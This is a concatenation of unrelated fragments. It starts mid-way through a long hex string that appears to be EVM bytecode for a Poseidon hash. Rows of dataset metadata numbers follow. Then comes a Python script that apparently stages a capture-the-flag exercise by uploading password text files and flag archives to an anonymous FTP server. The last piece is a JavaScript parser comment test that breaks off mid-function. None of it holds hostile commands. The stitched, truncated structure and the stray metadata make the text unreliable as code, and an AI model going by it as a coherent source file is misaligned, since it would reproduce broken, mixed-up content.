45a0767c5b055812467f081108f7dfee5dcfc10f80079da8e941c77cc13db6884818308915084818408925084818508935050838181808280098009099050620006816000526200138c565b7f2c59e967a2d4ea6770593f65039451741d23b5da99dc8042070a39907478b66e84818308915084818408925084818508935050838181808280098009099050620006ce6000526200138c565b7f24c85e48d7afe1001e8f66c6dd31213b4288933a0ad379864f16743df2c98003848183089150848184089250848185089350508381818082800980090990506200071b6000526200138c565b7f227cd523af710c598ecab087c2843100f7a9738c3d488c007e428d91b1f3376684818308915084818408925084818508935050838181808280098009099050620007686000526200138c565b7f2559fff5296c533ad4c7c6e1c88b9c69980b197513e317db5402d492799eeb9f84818308915084818408925084818508935050838181808280098009099050620007b56000526200138c565b7f02a601bfc4da9459e9718fe6b926c0e175e63aa2217abf643dc9e0757d7ef15484818308915084818408925084818508935050838181808280098009099050620008026000526200138c565b7f0da58042d5874668e8e0f3a278dfc8c8b08ccfbf5b4257ed2832affb60cb4112848183089150848184089250848185089350508381818082800980090990506200084f6000526200138c565b7f2e6fdd26eac7bf454187dee626ab4b3f421739e8318796503f16da5691f1bed9848183089150848184089250848185089350508381818082800980090990506200089c6000526200138c565b7f21be0174899457628eb771a9505580d1e4ef36ffb502219a2f43351b18d2784e84818308915084818408925084818508935050838181808280098009099050620008e96000526200138c565b7f2133b63278501b60e86883b00a54619ccf4a7cf07702dea240f53b19005f5a3684818308915084818408925084818508935050838181808280098009099050620009366000526200138c565b7f21841c731a220c4817edefba29768e949c0b519bb8e320fab91d0c18a102bc1884818308915084818408925084818508935050838181808280098009099050620009836000526200138c565b7f18b6901831fde10bda86893ae8cbd9f9da5af120dc44c89f5152926c28f2ed2f84818308915084818408925084818508935050838181808280098009099050620009d06000526200138c565b7f2ec53e23654ad18aca5c584b2eac05eb7d4db203b23ca6620ec475a8795d42028481830891508481840892508481850893505083818180828009800909905062000a1d6000526200138c565b7f2c939494de2138a2ca5e19ce4b67cdffce49ed1107248aa5edb6e12c7d28df778481830891508481840892508481850893505083818180828009800909905062000a6a6000526200138c565b7f0623ee7891199514435ad1ff285fb74fd43a7bb0dae62dbbdb36aff96e5089728481830891508481840892508481850893505083818180828009800909905062000ab76000526200138c565b7f22c8292e61a9bddf3d205cb50a7a4d29b06c431e53ec8fbaad8a73dd4104c64a8481830891508481840892508481850893505083818180828009800909905062000b046000526200138c565b7f0d51b55ec1f59f569076ecff66ba152b07679bc50dad6cd703b46b95e1cbd7e28481830891508481840892508481850893505083818180828009800909905062000b516000526200138c565b7f27154bbfb0588b6f36300701b00213556cb869bb368c63d1ded2a8416e273c0d8481830891508481840892508481850893505083818180828009800909905062000b9e6000526200138c565b7f17b1370ccffe479909b0c1f7dc671b344494342940019105b90562cc4228eb5c8481830891508481840892508481850893505083818180828009800909905062000beb6000526200138c565b7f20ff783c31f906b9d0a4ae973600ee91e99e4565100c310065c27d01270590748481830891508481840892508481850893505083818180828009800909905062000c386000526200138c565b7f13c45ba44e91db74e719b45a15914640283f1db32e1a4304667bcf67230c615b8481830891508481840892508481850893505083818180828009800909905062000c856000526200138c565b7f29cfab68a5620b3760e361caac37294ec856607f2729f2403af22ae485fe48ba8481830891508481840892508481850893505083818180828009800909905062000cd26000526200138c565b7f1380cf7791392e856692cd802e0820e89d319fe8b262dffb8abd00cc83d10f278481830891508481840892508481850893505083818180828009800909905062000d1f6000526200138c565b7f2d9d9fdcac77dd461f1b159edc18eac9e53a01172733e042fe4ab39f76d4939b8481830891508481840892508481850893505083818180828009800909905062000d6c6000526200138c565b7f0028701c995d998357f61aae3b02a6764caf807a024ba0478965be12256d62a08481830891508481840892508481850893505083818180828009800909905062000db96000526200138c565b7f06268de0019eb6197fd8b34ca05a250aa2215a169f66b89acc7c70bbbdd265918481830891508481840892508481850893505083818180828009800909905062000e066000526200138c565b7f1b8191c81911bb23fd08d9f32c9cfc39d498d937c2cf2b4a286ce463f735e1b58481830891508481840892508481850893505083818180828009800909905062000e536000526200138c565b7f05a7f29c502bbc907f811b53e6901a4598539d0b2404c2c0f998bdc51d8772168481830891508481840892508481850893505083818180828009800909905062000ea06000526200138c565b7f164d0f7cbcdfd7c008c3ad541f1eb04374cdce427af07abbd20abb3c5f47e3228481830891508481840892508481850893505083818180828009800909905062000eed6000526200138c565b7f096f6dad4af11aef93cd170b131dc5ca907f1554edb860a2183b8f387bbfc4938481830891508481840892508481850893505083818180828009800909905062000f3a6000526200138c565b7f0aef194b2253cc03deb323029aa3d280cfc3bba70dbe35ebc76c4e5efb28f44c8481830891508481840892508481850893505083818180828009800909905062000f876000526200138c565b7f2739ce523e8ac7040f41978fcb09a61fc893f489a7ac63b7dc2b666a0450b8b78481830891508481840892508481850893505083818180828009800909905062000fd46000526200138c565b7f0dda954b88b4662b7228ea53dfc0035cf1c3e54a3eff951ed20eddf50abd007084818308915084818408925084818508935050838181808280098009099050620010216000526200138c565b7f06013c9903173cc6bf78d659ddc7ddde597add8f66b4adf14fd0fdd2aea80b42848183089150848184089250848185089350508381818082800980090990506200106e6000526200138c565b7f2a44a05caa05df06a56f318ae930c0f5b1238eff2cc641442940c42125e3b1d884818308915084818408925084818508935050838181808280098009099050620010bb6000526200138c565b7f14c09ffabca71eaed84af10167d78bb3e29f0bbbf2d4a7537e046b0b81a560c484818308915084818408925084818508935050838181808280098009099050620011086000526200138c565b7f142aaa6de3cf63bb4172a80f539bf5ecd9a42802d39bce5d3728e9bcde35a55a84818308915084818408925084818508935050838181808280098009099050620011556000526200138c565b7f06cea3644ef4942b5b898426b6c4845162e327a2ba7660cf2dca68f1ea3ab82a84818308915084818408925084818508935050838181808280098009099050620011a26000526200138c565b7f0fd2f28081191b6e436ee90785b22c924bc5936d6ff57c6e5d58f30a83dd463784818308915084818408925084818508935050838181808280098009099050620011ef6000526200138c565b7f1f138e07b3bd619267c920f1b52bf311de510f7b04b7c6575bc19dac05286c8584818308915084818408925084818508935050838181808280098009099050838281808280098009099150838381808280098009099250620012546000526200138c565b7f1f3a2010c0091c2bf3cdd2834b1480186f4e474b4178af042d82122a69ee1b6984818308915084818408925084818508935050838181808280098009099050838281808280098009099150838381808280098009099250620012b96000526200138c565b7f1a33927f88bde3319be2cc152435e2ca4b055462321224031404d350be0d03d4848183089150848184089250848185089350508381818082800980090990508382818082800980090991508383818082800980090992506200131e6000526200138c565b7f15aa17ff60cb072ec045ab101d2eaf64a7ad4cb59493994b4354eef81e7841bf84818308915084818408925084818508935050838181808280098009099050838281808280098009099150838381808280098009099250620013836000526200138c565b60005260206000f35b8360205182098460405184098591088460605185098591088460805183098560a05185098691088560c05186098691088560e0518409866110005186098791088661120051870987910894509250905060005156"
poseidon_6_data="0x38600c600039611e5d6000f37c01000000000000000000000000000000000000000000000000000000006000350463c4420fb4146200002e57fe5b7f2a605eab3c12c29701b9a8944a16ff3d64c199efa7c857c65e4c0560ab3b0ca16020527f1f5b500f1c0f88bcca0d51538b1a787ccd014eeb3831cecc5752dbb1a5732e756040527f140c27dca8225f48f74d55391032c02a2677a34a51cf8f329b6b1a0076a186316060527f2435feebb56e56c96b4d8a90637235e4f769cca19ee5cc0e1c84b4f74490cee36080527f1cabef035d32194e6327ccafed62049f16340bd6522d0e0cfc04c1f3eb6cb8a460a0527f0809febd6b71b85af68e97b3a334b8240e138d95bdec10f96757b1972c74c70360c0527f25a8fb283934520d61862db42ab5fbbf21a13613f7e99cae00232a61959d468f60e0527f063052928cdf6319a5cb946c2becbe0e4ebc9cc6244c9903a123707e595ebcad611000527f057ccb8d91f4a1fa9e5039cf4f457e364f940cf575259be35c614030535293c6611200527f249e9f24440c84e77026b8e111f2e6ca6d124556505b4e5bd5215983b445cbec611400527f17250b02a83957b0d036d216114793fe53ef92d12ce1b91666546ac818e40c74611600527f075c1923454f6b1f87f00b238dbda2323e5ed5885a07d6681c8148aacbc32df8611800527f29f93e7ee3e09f10c2b577ab2056fa0b2694d164866d49122ce17818e2277ec1611a00527f1321691a1c7edf2cdabb0bd4558d82ff697277299f7fec56406566faefd20d24611c00527f022588e3bcf16d2f9583ff188e2455e4d77e570a01366b13c3b0e9d1cd3dea27611e00527f2ae7c8d8341fc04509d31c5c3caf7b182cbadd6e89bd80e2a8dd438740a1400c612000527f25b1e032d89662f0666956c34f323c344278f370e4ca56409d7acc9098797797612200527f0af9bf6e54a040be1910bcab732d2a5451e356c9b0e54f196bc962bfa37a5784612400527f2a101efc715f13fe15729e91c076536903f8718ffac65a04a1fff47e51ed0d6d612600527f141194b8fa596f801dcbd27cd0a1fa45aa8d7a1db367e8f495dc906962b60750612800527f0a8bef1519e2b7cc844b0714b71fe093a73334505b6b8e71d731aa1a6a63e9b2612a00527f0980e6aa5e105658acd1eddde95a92ffa1556f142a596b401f48395d47dc5a51612c00527f0f4461f42060b27d3b34a34d8a0a2d3d6a3d812f3756dcb19e5b04c689a83a5b612e00527f0a9346be53c2fa9f7907c52cbf7204de8c1c5dc8b90e2a800c6c1d290ae62c00613000527f23d3d70151df81f917113a847d8e61f4929b7edcc6ba0dfe6bd0116713834d61613200527f125bcfe7de4c761bea5cc5f06d853f39840c8648e0e321d5ab7dc779252d32a6613400527f2cb31f422481e106c8cf448eaa6b61fe07544eff879951baefb03cb91dbc1e3e613600527f03c96fb68f083dfafb98c5e09181baf2f94dce618fbc78264bcc6ac102cd6f55613800527f1cbe64ac49aebf693279d246b2c8e257e99612512afdb30635f5b99ce579f92e613a00527f2375201a368412e3c2046d85fae310971047afe12b973a429b097e44843eef63613c00527f2185e429a96435c62e21e7091f4262685769e43fa49c9d40f88c41016c588ada613e00527f1d583a5b54b566e83a38a7667d0a979327e66a3bf403f589b5f24c617d6f1aee614000527f14d180bf4c3bb4c109918b8bed15f0f781bfec0e0d63bed877c5ba8d21d78184614200527f11c3c8fdf6c7cfa26046d59ad05834c854f7f4324fe53f4abfbc9437b3d13082614400527f2fd9287af078462bc14f7f1da959e7df7e9a1598b833d3e98cc3552456f8e985614600527f2ccb8565240997047bef4989cf92c3d2017eb0fa368b135d2d2941c13ddcd324614800527f30644e72e131a029b85045b68181585d2833e84879b9709143e1f593f000000160e43560c43560a4356084356064356044357f1fd4a35e68f0946f8f5dfd2ac9d7882ce2466ec1c9766f69b5a14c3f84a17be2878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990508682818082800980090991508683818082800980090992508684818082800980090993508685818082800980090994508686818082800980090995506200062960005262001cfd565b7f170118300987f2aa8128c6893a7691621b7dd210af7f412385f8d6663782490887818308915087818408925087818508935087818608945087818708955087818808965050868181808280098009099050868281808280098009099150868381808280098009099250868481808280098009099350868581808280098009099450868681808280098009099550620006c460005262001cfd565b7f0b734ac64dd2198297d67aab5b9f2dd61ae0a5e169692c8802760c97c1b7b0ed878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990508682818082800980090991508683818082800980090992508684818082800980090993508685818082800980090994508686818082800980090995506200075f60005262001cfd565b7f1430e42a7b4242b4586f06e9885a444ea4920fac92e2dfbc3cc16ebc2bc3416787818308915087818408925087818508935087818608945087818708955087818808965050868181808280098009099050868281808280098009099150868381808280098009099250868481808280098009099350868581808280098009099450868681808280098009099550620007fa60005262001cfd565b7f2d03cefd44927bbfa58fb8a8f22a0686c99db6ea9673e5ae2e3f51016b4d7812878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200085960005262001cfd565b7f27a60ef60d51be502cad8248a0f6ddc28f49ce9e174032bb1a054503691a99b387818308915087818408925087818508935087818608945087818708955087818808965050868181808280098009099050620008b860005262001cfd565b7f080a061bb2bc9ebb8c05ecf71fc842c7a09a85d48f5147fdd3bafc8d63a61801878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200091760005262001cfd565b7f0470cb196b0b31dcf0f998c08fd4a2d3784c84625d3d23cd9959c8df3d61a850878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200097660005262001cfd565b7f236a18fd797bcde8ceefd41745367450d80ecaf8fa5da304af8dd07d6c9c4a2f87818308915087818408925087818508935087818608945087818708955087818808965050868181808280098009099050620009d560005262001cfd565b7f2da94346d74ec77c4e5f937d2d595070636e2fcdb9349ce0e2c789c9e9d41ae78781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062000a3460005262001cfd565b7f278c16574216dd6780c4233d2e8bc1f90a76442f4fed1678d91a38f26a169f1d8781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062000a9360005262001cfd565b7f0aba88ce0a5f3f57c82b73cc72d86f0182a5ebbf61236cf2d67e3903428f105c8781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062000af260005262001cfd565b7f13d45f17ebd7bd267612d1c7d028c3ef2380ee77838b1809039156e45ea399da8781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062000b5160005262001cfd565b7f2d7a5202c14dd920b8382ce02653223d81eeeba9e2a27473af50810482e01dd78781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062000bb060005262001cfd565b7f245a0767c5b055812467f081108f7dfee5dcfc10f80079da8e941c77cc13db688781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062000c0f60005262001cfd565b7f2c59e967a2d4ea6770593f65039451741d23b5da99dc8042070a39907478b66e8781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062000c6e60005262001cfd565b7f24c85e48d7afe1001e8f66c6dd31213b4288933a0ad379864f16743df2c980038781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062000ccd60005262001cfd565b7f227cd523af710c598ecab087c2843100f7a9738c3d488c007e428d91b1f337668781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062000d2c60005262001cfd565b7f2559fff5296c533ad4c7c6e1c88b9c69980b197513e317db5402d492799eeb9f8781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062000d8b60005262001cfd565b7f02a601bfc4da9459e9718fe6b926c0e175e63aa2217abf643dc9e0757d7ef1548781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062000dea60005262001cfd565b7f0da58042d5874668e8e0f3a278dfc8c8b08ccfbf5b4257ed2832affb60cb41128781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062000e4960005262001cfd565b7f2e6fdd26eac7bf454187dee626ab4b3f421739e8318796503f16da5691f1bed98781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062000ea860005262001cfd565b7f21be0174899457628eb771a9505580d1e4ef36ffb502219a2f43351b18d2784e8781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062000f0760005262001cfd565b7f2133b63278501b60e86883b00a54619ccf4a7cf07702dea240f53b19005f5a368781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062000f6660005262001cfd565b7f21841c731a220c4817edefba29768e949c0b519bb8e320fab91d0c18a102bc188781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062000fc560005262001cfd565b7f18b6901831fde10bda86893ae8cbd9f9da5af120dc44c89f5152926c28f2ed2f878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200102460005262001cfd565b7f2ec53e23654ad18aca5c584b2eac05eb7d4db203b23ca6620ec475a8795d4202878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200108360005262001cfd565b7f2c939494de2138a2ca5e19ce4b67cdffce49ed1107248aa5edb6e12c7d28df7787818308915087818408925087818508935087818608945087818708955087818808965050868181808280098009099050620010e260005262001cfd565b7f0623ee7891199514435ad1ff285fb74fd43a7bb0dae62dbbdb36aff96e508972878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200114160005262001cfd565b7f22c8292e61a9bddf3d205cb50a7a4d29b06c431e53ec8fbaad8a73dd4104c64a87818308915087818408925087818508935087818608945087818708955087818808965050868181808280098009099050620011a060005262001cfd565b7f0d51b55ec1f59f569076ecff66ba152b07679bc50dad6cd703b46b95e1cbd7e287818308915087818408925087818508935087818608945087818708955087818808965050868181808280098009099050620011ff60005262001cfd565b7f27154bbfb0588b6f36300701b00213556cb869bb368c63d1ded2a8416e273c0d878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200125e60005262001cfd565b7f17b1370ccffe479909b0c1f7dc671b344494342940019105b90562cc4228eb5c87818308915087818408925087818508935087818608945087818708955087818808965050868181808280098009099050620012bd60005262001cfd565b7f20ff783c31f906b9d0a4ae973600ee91e99e4565100c310065c27d0127059074878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200131c60005262001cfd565b7f13c45ba44e91db74e719b45a15914640283f1db32e1a4304667bcf67230c615b878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200137b60005262001cfd565b7f29cfab68a5620b3760e361caac37294ec856607f2729f2403af22ae485fe48ba87818308915087818408925087818508935087818608945087818708955087818808965050868181808280098009099050620013da60005262001cfd565b7f1380cf7791392e856692cd802e0820e89d319fe8b262dffb8abd00cc83d10f27878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200143960005262001cfd565b7f2d9d9fdcac77dd461f1b159edc18eac9e53a01172733e042fe4ab39f76d4939b878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200149860005262001cfd565b7f0028701c995d998357f61aae3b02a6764caf807a024ba0478965be12256d62a087818308915087818408925087818508935087818608945087818708955087818808965050868181808280098009099050620014f760005262001cfd565b7f06268de0019eb6197fd8b34ca05a250aa2215a169f66b89acc7c70bbbdd26591878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200155660005262001cfd565b7f1b8191c81911bb23fd08d9f32c9cfc39d498d937c2cf2b4a286ce463f735e1b587818308915087818408925087818508935087818608945087818708955087818808965050868181808280098009099050620015b560005262001cfd565b7f05a7f29c502bbc907f811b53e6901a4598539d0b2404c2c0f998bdc51d877216878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200161460005262001cfd565b7f164d0f7cbcdfd7c008c3ad541f1eb04374cdce427af07abbd20abb3c5f47e322878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200167360005262001cfd565b7f096f6dad4af11aef93cd170b131dc5ca907f1554edb860a2183b8f387bbfc49387818308915087818408925087818508935087818608945087818708955087818808965050868181808280098009099050620016d260005262001cfd565b7f0aef194b2253cc03deb323029aa3d280cfc3bba70dbe35ebc76c4e5efb28f44c878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200173160005262001cfd565b7f2739ce523e8ac7040f41978fcb09a61fc893f489a7ac63b7dc2b666a0450b8b7878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200179060005262001cfd565b7f0dda954b88b4662b7228ea53dfc0035cf1c3e54a3eff951ed20eddf50abd007087818308915087818408925087818508935087818608945087818708955087818808965050868181808280098009099050620017ef60005262001cfd565b7f06013c9903173cc6bf78d659ddc7ddde597add8f66b4adf14fd0fdd2aea80b42878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200184e60005262001cfd565b7f2a44a05caa05df06a56f318ae930c0f5b1238eff2cc641442940c42125e3b1d887818308915087818408925087818508935087818608945087818708955087818808965050868181808280098009099050620018ad60005262001cfd565b7f14c09ffabca71eaed84af10167d78bb3e29f0bbbf2d4a7537e046b0b81a560c4878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200190c60005262001cfd565b7f142aaa6de3cf63bb4172a80f539bf5ecd9a42802d39bce5d3728e9bcde35a55a878183089150878184089250878185089350878186089450878187089550878188089650508681818082800980090990506200196b60005262001cfd565b7f06cea3644ef4942b5b898426b6c4845162e327a2ba7660cf2dca68f1ea3ab82a87818308915087818408925087818508935087818608945087818708955087818808965050868181808280098009099050620019ca60005262001cfd565b7f0fd2f28081191b6e436ee90785b22c924bc5936d6ff57c6e5d58f30a83dd46378781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062001a2960005262001cfd565b7f1f138e07b3bd619267c920f1b52bf311de510f7b04b7c6575bc19dac05286c858781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905062001a8860005262001cfd565b7f1f3a2010c0091c2bf3cdd2834b1480186f4e474b4178af042d82122a69ee1b698781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905086828180828009800909915086838180828009800909925086848180828009800909935086858180828009800909945086868180828009800909955062001b2360005262001cfd565b7f1a33927f88bde3319be2cc152435e2ca4b055462321224031404d350be0d03d48781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905086828180828009800909915086838180828009800909925086848180828009800909935086858180828009800909945086868180828009800909955062001bbe60005262001cfd565b7f15aa17ff60cb072ec045ab101d2eaf64a7ad4cb59493994b4354eef81e7841bf8781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905086828180828009800909915086838180828009800909925086848180828009800909935086858180828009800909945086868180828009800909955062001c5960005262001cfd565b7f16742ccf030b475a60958dc351e00eb04c088b74d90ba19cd0dc52ff1d8f71788781830891508781840892508781850893508781860894508781870895508781880896505086818180828009800909905086828180828009800909915086838180828009800909925086848180828009800909935086858180828009800909945086868180828009800909955062001cf460005262001cfd565b60005260206000f35b8660205182098760405184098891088760605185098891088760805186098891088760a05187098891088760c05188098891088760e0518309886110005185098991088861120051860989910888611400518709899108886116005188098991088861180051890989910888611a0051840989611c005186098a910889611e005187098a9108896120005188098a9108896122005189098a910889612400518a098a9108896126005185098a6128005187098b91088a612a005188098b91088a612c005189098b91088a612e00518a098b91088a613000518b098b91088a6132005186098b6134005188098c91088b6136005189098c91088b613800518a098c91088b613a00518b098c91088b613c00518c098c91088b613e005187098c6140005189098d91088c614200518a098d91088c614400518b098d91088c614600518c098d91088c614800518d098d91089a509850965094509250905060005156" | 8,604.666667 | 15,590 | 0.99969 | 8 | 25,814 | 3,225.25 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.824733 | 0.000077 | 25,814 | 3 | 15,590 | 8,604.666667 | 0.17488 | 0 | 0 | 0 | 0 | 0 | 0.998489 | 0.998489 | 0 | 1 | 0.998489 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
b82cf1b63aacee9bd2651c4fb9444bb625d0bd34 | 1,285 | py | Python | introduction/network/clpwn-net-ctf/ctf-management/a_rot_of_txt.py | 4ensiX/my-ctf | fcd60e1e0a2ee89688666155c931e9c55572a2c0 | [
"MIT"
] | null | null | null | introduction/network/clpwn-net-ctf/ctf-management/a_rot_of_txt.py | 4ensiX/my-ctf | fcd60e1e0a2ee89688666155c931e9c55572a2c0 | [
"MIT"
] | null | null | null | introduction/network/clpwn-net-ctf/ctf-management/a_rot_of_txt.py | 4ensiX/my-ctf | fcd60e1e0a2ee89688666155c931e9c55572a2c0 | [
"MIT"
] | null | null | null | import pathlib
from ftplib import FTP
ftp = FTP(
"10.10.10.5",
"anonymous",
passwd=""
)
fnames = open("filename.list","r")
fn = fnames.readlines()
plist = open("password.list","r")
pwd = plist.readlines()
for i in range(12):
pf = pathlib.Path(fn[i].rstrip('\n') +".txt")
pf.touch()
wf = open(fn[i].rstrip('\n')+".txt","w")
wf.write(pwd[i])
wf.close()
uf = open(fn[i].rstrip('\n')+".txt", "rb")
ftp.storlines("STOR "+fn[i].rstrip('\n')+".txt", uf)
ff = open("../flag1-1/flag.zip", "rb")
ftp.storbinary("STOR flag.zip", ff)
for i in range(12,35):
pf = pathlib.Path(fn[i].rstrip('\n') +".txt")
pf.touch()
wf = open(fn[i].rstrip('\n')+".txt","w")
wf.write(pwd[i])
wf.close()
uf = open(fn[i].rstrip('\n')+".txt", "rb")
ftp.storlines("STOR "+fn[i].rstrip('\n')+".txt", uf)
ff = open("../flag2-1/flag.zip", "rb")
ftp.storbinary("STOR flag.zip", ff)
for i in range(35,50):
pf = pathlib.Path(fn[i].rstrip('\n') +".txt")
pf.touch()
wf = open(fn[i].rstrip('\n')+".txt","w")
wf.write(pwd[i])
wf.close()
uf = open(fn[i].rstrip('\n')+".txt", "rb")
ftp.storlines("STOR "+fn[i].rstrip('\n')+".txt", uf)
ff = open("../flag3-1/flag.zip", "rb")
ftp.storbinary("STOR flag.zip", ff)
| 23.363636 | 61 | 0.538521 | 209 | 1,285 | 3.311005 | 0.229665 | 0.052023 | 0.156069 | 0.17341 | 0.768786 | 0.74711 | 0.74711 | 0.74711 | 0.74711 | 0.74711 | 0 | 0.021842 | 0.180545 | 1,285 | 54 | 62 | 23.796296 | 0.635328 | 0 | 0 | 0.585366 | 0 | 0 | 0.199187 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.04878 | 0.04878 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b841aa59b1d368e904ab7bdfad0c56ad9a32af9d | 55,404 | py | Python | jasy/test/js/comments.py | zynga/jasy | 8a2ec2c2ca3f6c0f73cba4306e581c89b30f1b18 | [
"MIT"
] | 16 | 2015-01-02T19:05:06.000Z | 2020-08-20T14:55:15.000Z | jasy/test/js/comments.py | zynga/jasy | 8a2ec2c2ca3f6c0f73cba4306e581c89b30f1b18 | [
"MIT"
] | 30 | 2019-01-02T16:30:14.000Z | 2019-01-02T16:31:12.000Z | jasy/test/js/comments.py | zynga/jasy | 8a2ec2c2ca3f6c0f73cba4306e581c89b30f1b18 | [
"MIT"
] | 4 | 2015-05-17T21:51:44.000Z | 2020-08-20T14:55:17.000Z | #!/usr/bin/env python3
import sys, os, unittest, logging
# Extend PYTHONPATH with local 'lib' folder
if __name__ == "__main__":
jasyroot = os.path.normpath(os.path.join(os.path.abspath(sys.argv[0]), os.pardir, os.pardir, os.pardir, os.pardir))
sys.path.insert(0, jasyroot)
print("Running from %s..." % jasyroot)
import jasy.js.parse.Parser as Parser
class Tests(unittest.TestCase):
def process(self, code):
node = Parser.parse(code)
return node
#
# SINGLE COMMENTS
#
def test_single(self):
parsed = self.process('''
// Single Comment
singleCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "single")
self.assertEqual(parsed[0].comments[0].text, "Single Comment")
def test_single_unbound(self):
parsed = self.process('''
// Single Comment
''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
self.assertEqual(parsed.comments[0].variant, "single")
self.assertEqual(parsed.comments[0].text, "Single Comment")
def test_single_unbound_nobreak(self):
parsed = self.process('''// Single Comment''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
self.assertEqual(parsed.comments[0].variant, "single")
self.assertEqual(parsed.comments[0].text, "Single Comment")
def test_single_two(self):
parsed = self.process('''
// Single1 Comment
// Single2 Comment
singleCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 2)
self.assertEqual(parsed[0].comments[0].variant, "single")
self.assertEqual(parsed[0].comments[0].text, "Single1 Comment")
self.assertEqual(parsed[0].comments[1].variant, "single")
self.assertEqual(parsed[0].comments[1].text, "Single2 Comment")
#
# SINGLE COMMENTS :: CONTEXT
#
def test_single_context_inline(self):
parsed = self.process('''singleCommentCmd(); // Single Inline Comment''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "single")
self.assertEqual(parsed[0].comments[0].context, "inline")
def test_single_context_block_before(self):
parsed = self.process('''
singleCommentCmd();
// Single Block Comment
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "single")
self.assertEqual(parsed[0].comments[0].context, "block")
def test_single_context_block_after(self):
parsed = self.process('''
// Single Block Comment
singleCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "single")
self.assertEqual(parsed[0].comments[0].context, "block")
def test_single_context_section(self):
parsed = self.process('''
// Single Section Comment
singleCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "single")
self.assertEqual(parsed[0].comments[0].context, "section")
#
# MULTI COMMENTS
#
def test_multi(self):
parsed = self.process('''
/* Multi Comment */
multiCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "multi")
self.assertEqual(parsed[0].comments[0].text, "Multi Comment")
def test_multi_unbound(self):
parsed = self.process('''
/* Multi Comment */
''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
self.assertEqual(parsed.comments[0].variant, "multi")
self.assertEqual(parsed.comments[0].text, "Multi Comment")
def test_multi_unbound_nobreak(self):
